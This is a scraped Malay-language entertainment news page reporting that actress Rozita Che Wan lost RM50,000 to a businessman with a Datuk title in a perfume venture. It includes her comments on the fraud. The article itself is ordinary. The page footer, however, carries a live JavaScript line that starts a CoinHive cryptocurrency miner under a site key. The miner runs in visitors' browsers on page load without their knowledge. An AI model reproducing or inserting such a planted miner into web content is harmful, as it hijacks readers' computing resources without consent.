© Copyright 2017, All Rights Reserved
Home / Hiburan / Che Ta kena auta RM50,000

Che Ta kena auta RM50,000

PELAKON popular Rozita Che Wan kerugian RM50,000 selepas menjadi mangsa tipu seorang ahli perniagaan bergelar Datuk bagi penghasilan produk minyak wangi sejak tahun lalu.

Rozita yang mesra disapa Che Ta berkata, lelaki itu adalah individu sama yang turut menipu pasangan pelakon Aeril Zafrel dan Wawa Zainal, baru-baru ini.

“Saya ingatkan saya seorang saja kena tipu, rupa-rupanya Aeril dan Wawa pun turut menjadi mangsa. Namun, saya tidak membuat laporan polis kerana tiada sebarang perjanjian bertulis antara kami.

“Banyak kali saya minta dia pulangkan wang itu, tetapi tidak ada sebarang maklum balas daripada pihaknya. Jadi saya malas nak perbesarkan isu ini,” katanya kepada Harian Metro.

Menurut Che Ta, itu adalah jumlah penipuan terbesar yang berlaku terhadapnya dalam perniagaan.

“Saya percaya doa orang teraniaya ini dimakbulkan Allah. Apabila saya reda, maksudnya saya halalkan duit itu. Biarlah dia menerima balasan daripada Allah.

“Hilang RM50,000 sekelip mata, Allah gantikan dengan rezeki lain pula. Cuma, saya terkilan dengan tindakannya yang sanggup berbuat sedemikian.

“Orang yang menipu ini hidupnya tidak tenang. Buktinya, sekarang dia menghilangkan diri dan tidak tahu berada di mana. Semua orang cari dia,” katanya.

Che Ta juga mendakwa, Datuk itu mempamer cara hidup mewah dengan membeli kereta dan rumah baru, berkahwin lain dan banyak lagi.

“Saya memang percayakannya, tetapi tidak sangka pula dia sanggup ambil kesempatan ke atas saya. Mungkin sebab saya mudah percayakan orang, dia sanggup menipu saya.

“Walaupun tidak ada perjanjian bertulis, tetapi saya ada semua bukti pembayaran,” katanya yang mengambil keputusan menukar pengilang baru,” katanya.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Idayu juara AF Megastar 2017

SHAH ALAM: Idayu dinobatkan sebagai Juara AF Megastar sekali gus meraih wang ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();